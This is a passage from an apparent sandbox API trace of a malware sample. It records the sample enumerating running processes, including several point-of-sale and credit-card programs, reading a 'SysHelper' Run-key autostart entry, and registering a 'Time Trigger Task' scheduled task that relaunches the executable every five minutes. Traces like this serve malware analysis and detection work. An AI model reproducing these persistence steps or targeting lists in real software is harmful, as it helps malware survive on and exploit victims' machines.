lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0111.325] CloseHandle (hObject=0x5a0) returned 1 [0111.325] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x86c) returned 0x5a0 [0111.325] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.326] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x970000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0111.327] CloseHandle (hObject=0x5a0) returned 1 [0111.327] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x87c) returned 0x5a0 [0111.327] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.328] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1170000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0111.329] CloseHandle (hObject=0x5a0) returned 1 [0111.329] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x88c) returned 0x5a0 [0111.329] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.330] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x130000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0111.331] CloseHandle (hObject=0x5a0) returned 1 [0111.331] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x89c) returned 0x5a0 [0111.331] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.332] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x8c0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0111.332] CloseHandle (hObject=0x5a0) returned 1 [0111.333] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ac) returned 0x5a0 [0111.333] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.334] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xb70000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0111.334] CloseHandle (hObject=0x5a0) returned 1 [0111.334] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8bc) returned 0x5a0 [0111.334] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.336] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xa30000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0111.336] CloseHandle (hObject=0x5a0) returned 1 [0111.336] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x5a0 [0111.336] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.337] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xb20000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0111.338] CloseHandle (hObject=0x5a0) returned 1 [0111.338] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x5a0 [0111.338] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.339] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xaa0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0111.340] CloseHandle (hObject=0x5a0) returned 1 [0111.340] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x5a0 [0111.340] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.341] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x10c0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0111.342] CloseHandle (hObject=0x5a0) returned 1 [0111.342] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8fc) returned 0x5a0 [0111.342] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.343] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x9a0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0111.343] CloseHandle (hObject=0x5a0) returned 1 [0111.344] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90c) returned 0x5a0 [0111.344] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.345] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xa0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0111.345] CloseHandle (hObject=0x5a0) returned 1 [0111.345] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x5a0 [0111.345] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.347] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x13d0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0111.347] CloseHandle (hObject=0x5a0) returned 1 [0111.347] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x5a0 [0111.347] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.349] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xab0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0111.349] CloseHandle (hObject=0x5a0) returned 1 [0111.349] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x5a0 [0111.349] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.350] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x330000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0111.351] CloseHandle (hObject=0x5a0) returned 1 [0111.351] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x5a0 [0111.351] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.352] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x10c0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0111.353] CloseHandle (hObject=0x5a0) returned 1 [0111.353] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x5a0 [0111.353] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.354] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xa30000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0111.355] CloseHandle (hObject=0x5a0) returned 1 [0111.355] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x5a0 [0111.355] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.356] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1160000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0111.356] CloseHandle (hObject=0x5a0) returned 1 [0111.356] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x5a0 [0111.357] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.358] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xb80000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0111.358] CloseHandle (hObject=0x5a0) returned 1 [0111.358] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x98c) returned 0x5a0 [0111.358] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.360] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x9a0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0111.360] CloseHandle (hObject=0x5a0) returned 1 [0111.360] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x99c) returned 0x5a0 [0111.360] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.362] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1170000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0111.362] CloseHandle (hObject=0x5a0) returned 1 [0111.362] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b4) returned 0x5a0 [0111.362] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.364] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x360000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="kentucky-phrases-casual.exe") returned 0x1b [0111.364] CloseHandle (hObject=0x5a0) returned 1 [0111.364] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c4) returned 0x5a0 [0111.364] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.366] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1240000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="breaking.exe") returned 0xc [0111.366] CloseHandle (hObject=0x5a0) returned 1 [0111.366] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d4) returned 0x5a0 [0111.366] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.367] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1b0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="enforcement_wv_transmitted.exe") returned 0x1e [0111.368] CloseHandle (hObject=0x5a0) returned 1 [0111.368] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e4) returned 0x5a0 [0111.368] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.369] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x60000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="friend.exe") returned 0xa [0111.369] CloseHandle (hObject=0x5a0) returned 1 [0111.370] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa14) returned 0x0 [0111.370] CloseHandle (hObject=0x0) returned 0 [0111.370] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0111.370] CloseHandle (hObject=0x0) returned 0 [0111.370] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c8) returned 0x0 [0111.370] CloseHandle (hObject=0x0) returned 0 [0111.370] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x0 [0111.370] CloseHandle (hObject=0x0) returned 0 [0111.370] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x780) returned 0x0 [0111.370] CloseHandle (hObject=0x0) returned 0 [0111.370] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x138) returned 0x0 [0111.370] CloseHandle (hObject=0x0) returned 0 [0111.370] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x844) returned 0x5a0 [0111.370] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 0 [0111.370] CloseHandle (hObject=0x5a0) returned 1 [0111.370] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x34c) returned 0x5a0 [0111.371] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0111.372] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x400000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="OqRoSnESYXcDITEx.exe") returned 0x14 [0111.372] CloseHandle (hObject=0x5a0) returned 1 [0111.372] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x28) returned 0x4999b10 [0111.372] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x49c2720 [0111.372] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74ebba8 [0111.373] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x49c4b58 [0111.373] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x49c4dc0 [0111.373] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74e0f20 [0111.373] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74e1188 [0111.373] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74e13f0 [0111.373] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74e1658 [0111.373] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74e18c0 [0111.373] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x74e1b28 [0111.373] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d868 | out: phkResult=0x18d868*=0x5a0) returned 0x0 [0111.373] RegQueryValueExW (in: hKey=0x5a0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d864, lpData=0x18bf90, lpcbData=0x18d848*=0x400 | out: lpType=0x18d864*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe\" --AutoStart", lpcbData=0x18d848*=0xe8) returned 0x0 [0111.373] RegCloseKey (hKey=0x5a0) returned 0x0 [0111.373] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xf0) returned 0x49ab900 [0111.373] lstrlenA (lpString="\" --AutoStart") returned 13 [0111.373] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xd0) returned 0x74a5590 [0111.373] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49ab900 | out: hHeap=0x4970000) returned 1 [0111.373] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe") returned 1 [0111.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xd0) returned 0x74a5668 [0111.374] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74a5590 | out: hHeap=0x4970000) returned 1 [0111.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xd0) returned 0x74a5590 [0111.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xd0) returned 0x74a5740 [0111.374] CoInitialize (pvReserved=0x0) returned 0x0 [0111.392] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0111.392] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xd0) returned 0x74a59c8 [0111.392] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18d854 | out: ppv=0x18d854*=0x6b808b8) returned 0x0 [0111.401] TaskScheduler:ITaskService:Connect (This=0x6b808b8, serverName=0x18d2e0*(varType=0x0, wReserved1=0x77c6, wReserved2=0xe0d2, wReserved3=0x77c6, varVal1=0x67, varVal2=0xd0), user=0x18d2f0*(varType=0x0, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x0, varVal2=0xd8), domain=0x18d300*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), password=0x18d310*(varType=0x0, wReserved1=0x74e, wReserved2=0xd7fc, wReserved3=0x18, varVal1=0x420cab, varVal2=0x4970000)) returned 0x0 [0111.415] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74e83e8 [0111.415] TaskScheduler:ITaskService:GetFolder (in: This=0x6b808b8, Path="\\", ppFolder=0x18d85c | out: ppFolder=0x18d85c*=0x6b80920) returned 0x0 [0111.418] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e83e8 | out: hHeap=0x4970000) returned 1 [0111.418] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74e83e8 [0111.418] ITaskFolder:DeleteTask (This=0x6b80920, Name="Time Trigger Task", flags=0) returned 0x0 [0111.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e83e8 | out: hHeap=0x4970000) returned 1 [0111.602] TaskScheduler:ITaskService:NewTask (in: This=0x6b808b8, flags=0x0, ppDefinition=0x18d860 | out: ppDefinition=0x18d860*=0x6b80950) returned 0x0 [0111.603] TaskScheduler:IUnknown:Release (This=0x6b808b8) returned 0x1 [0111.603] ITaskDefinition:get_RegistrationInfo (in: This=0x6b80950, ppRegistrationInfo=0x18d834 | out: ppRegistrationInfo=0x18d834*=0x6b80a10) returned 0x0 [0111.603] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74e8430 [0111.603] IRegistrationInfo:put_Author (This=0x6b80a10, Author="Author Name") returned 0x0 [0111.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e8430 | out: hHeap=0x4970000) returned 1 [0111.603] IUnknown:Release (This=0x6b80a10) returned 0x1 [0111.603] ITaskDefinition:get_Principal (in: This=0x6b80950, ppPrincipal=0x18d83c | out: ppPrincipal=0x18d83c*=0x6b80ba0) returned 0x0 [0111.603] IPrincipal:put_LogonType (This=0x6b80ba0, LogonType=3) returned 0x0 [0111.603] IUnknown:Release (This=0x6b80ba0) returned 0x1 [0111.603] ITaskDefinition:get_Settings (in: This=0x6b80950, ppSettings=0x18d844 | out: ppSettings=0x18d844*=0x6b80ac0) returned 0x0 [0111.604] ITaskSettings:put_StartWhenAvailable (This=0x6b80ac0, StartWhenAvailable=1) returned 0x0 [0111.604] IUnknown:Release (This=0x6b80ac0) returned 0x1 [0111.604] ITaskSettings:get_IdleSettings (in: This=0x6b80ac0, ppIdleSettings=0x18d828 | out: ppIdleSettings=0x18d828*=0x6b80b30) returned 0x0 [0111.604] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74e8430 [0111.604] IIdleSettings:put_WaitTimeout (This=0x6b80b30, WaitTimeout="PT5M") returned 0x0 [0111.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e8430 | out: hHeap=0x4970000) returned 1 [0111.604] IUnknown:Release (This=0x6b80b30) returned 0x1 [0111.604] ITaskDefinition:get_Triggers (in: This=0x6b80950, ppTriggers=0x18d824 | out: ppTriggers=0x18d824*=0x6b80a80) returned 0x0 [0111.605] ITriggerCollection:Create (in: This=0x6b80a80, Type=1, ppTrigger=0x18d830 | out: ppTrigger=0x18d830*=0x6b80c00) returned 0x0 [0111.605] IUnknown:Release (This=0x6b80a80) returned 0x1 [0111.605] IUnknown:QueryInterface (in: This=0x6b80c00, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18d84c | out: ppvObject=0x18d84c*=0x6b80c00) returned 0x0 [0111.605] IUnknown:Release (This=0x6b80c00) returned 0x2 [0111.605] ITrigger:get_Repetition (in: This=0x6b80c00, ppRepeat=0x18d838 | out: ppRepeat=0x18d838*=0x6b80c50) returned 0x0 [0111.605] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74e8430 [0111.605] IRepetitionPattern:put_Interval (This=0x6b80c50, Interval="PT5M") returned 0x0 [0111.605] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e8430 | out: hHeap=0x4970000) returned 1 [0111.605] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74e8430 [0111.605] IRepetitionPattern:put_Duration (This=0x6b80c50, Duration="") returned 0x0 [0111.605] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e8430 | out: hHeap=0x4970000) returned 1 [0111.606] ITrigger:put_Repetition (This=0x6b80c00, Repetition=0x6b80c50) returned 0x0 [0111.606] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74e8430 [0111.606] ITrigger:put_Id (This=0x6b80c00, Id="Trigger1") returned 0x0 [0111.606] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e8430 | out: hHeap=0x4970000) returned 1 [0111.606] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74e8430 [0111.606] ITrigger:put_EndBoundary (This=0x6b80c00, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0111.606] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e8430 | out: hHeap=0x4970000) returned 1 [0111.606] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d30c | out: lpSystemTimeAsFileTime=0x18d30c*(dwLowDateTime=0xdbc7eca0, dwHighDateTime=0x1d6d58a)) [0111.606] GetLastError () returned 0x0 [0111.606] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0x7505df8 [0111.606] GetLastError () returned 0x0 [0111.606] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0111.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d274 | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d274) returned 26 [0111.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d274 | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d274) returned 26 [0111.612] GetLastError () returned 0x0 [0111.612] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0x7505e28 [0111.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x7505e28, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0111.612] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0x7497900 [0111.612] GetLastError () returned 0x0 [0111.612] ITrigger:put_StartBoundary (This=0x6b80c00, StartBoundary="2020-12-19T09:14:32") returned 0x0 [0111.612] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e8430 | out: hHeap=0x4970000) returned 1 [0111.612] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4318 | out: hHeap=0x4970000) returned 1 [0111.612] IUnknown:Release (This=0x6b80c00) returned 0x1 [0111.612] ITaskDefinition:get_Actions (in: This=0x6b80950, ppActions=0x18d840 | out: ppActions=0x18d840*=0x6b809c8) returned 0x0 [0111.613] IActionCollection:Create (in: This=0x6b809c8, Type=0, ppAction=0x18d82c | out: ppAction=0x18d82c*=0x6b80c98) returned 0x0 [0111.613] IUnknown:Release (This=0x6b809c8) returned 0x1 [0111.613] IUnknown:QueryInterface (in: This=0x6b80c98, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18d848 | out: ppvObject=0x18d848*=0x6b80c98) returned 0x0 [0111.613] IUnknown:Release (This=0x6b80c98) returned 0x2 [0111.613] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74e8430 [0111.613] IExecAction:put_Path (This=0x6b80c98, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe") returned 0x0 [0111.613] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e8430 | out: hHeap=0x4970000) returned 1 [0111.613] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74e8430 [0111.613] IExecAction:put_Arguments (This=0x6b80c98, Arguments="--Task") returned 0x0 [0111.613] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e8430 | out: hHeap=0x4970000) returned 1 [0111.613] IUnknown:Release (This=0x6b80c98) returned 0x1 [0111.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74e8430 [0111.614] ITaskFolder:RegisterTaskDefinition (in: This=0x6b80920, Path="Time Trigger Task", pDefinition=0x6b80950, flags=6, UserId=0x18d2e8*(varType=0x0, wReserved1=0x74e, wReserved2=0xd7fc, wReserved3=0x18, varVal1=0x420cab, varVal2=0x4970000), password=0x18d2f8*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), LogonType=3, sddl=0x18d30c*(varType=0x8, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1="", varVal2=0xd8), ppTask=0x18d814 | out: ppTask=0x18d814*=0x6b80d18) returned 0x0 [0111.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e8430 | out: hHeap=0x4970000) returned 1 [0111.960] TaskScheduler:IUnknown:Release (This=0x6b80920) returned 0x0 [0111.960] TaskScheduler:IUnknown:Release (This=0x6b80950) returned 0x0 [0111.960] 